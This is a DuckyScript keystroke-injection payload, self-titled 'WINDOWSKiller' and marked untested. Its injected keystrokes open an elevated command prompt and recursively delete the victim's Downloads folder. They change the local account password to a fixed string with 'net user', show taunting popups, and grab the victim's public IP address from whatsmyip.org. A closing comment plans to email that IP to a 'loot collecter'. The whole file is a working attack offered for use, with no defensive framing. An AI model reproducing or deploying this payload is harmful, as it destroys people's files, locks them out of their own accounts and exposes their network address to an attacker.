REM THIS IS v1 AND UNTESTED
REM THIS IS A WIP (WORK IN PROGRESS) SCRIPT
GUI R
DELAY 500
STRING powershell -Command "$ws = New-Object -ComObject Wscript.Shell; $ws.Popup('This is v1 of the software and is untested', 1, 'LK2_WINDOWSKiller_V1.0.0', 4096)" ENTER
DELAY 1200
GUI R
DELAY 500
STRING powershell Start-Process cmd -Verb runAs
DELAY 2000
STRING del /q /s %userprofile%\Downloads\*
ENTER
DELAY 1000
GUI R
DELAY 500
STRING powershell -Command "$ws = New-Object -ComObject Wscript.Shell; $ws.Popup('Downloads folder deleted woops', 1, 'LK2_WINDOWSKiller_V1.0.0', 4096)"
ENTER
DELAY 1200
STRING net user %username% *
ENTER
DELAY 500
STRING LK2fdfhuydfhsdfsdjkf
ENTER
DELAY 500
STRING LK2fdfhuydfhsdfsdjkf
ENTER
DELAY 1000
GUI R
DELAY 500
STRING  powershell -Command "$ws = New-Object -ComObject Wscript.Shell; $ws.Popup('if on a local acc then ur password got changed', 1, 'LK2_WINDOWSKiller_V1.0.0', 4096)"
ENTER
DELAY 1200
GUI R
DELAY 500
STRING  powershell -Command "$ws = New-Object -ComObject Wscript.Shell; $ws.Popup('I wont delete system 32 bc im kind', 1, 'LK2_WINDOWSKiller_V1.0.0', 4096)"
ENTER
DELAY 1200
GUI R
DELAY 500
STRING whatsmyip.org
ENTER
DELAY 2000
CONTROL A
DELAY 500
CONTROL C
DELAY 500
CONTROL W
DELAY 750
GUI R
DELAY 500
STRING
REM notes make it send email to loot collecter with ip
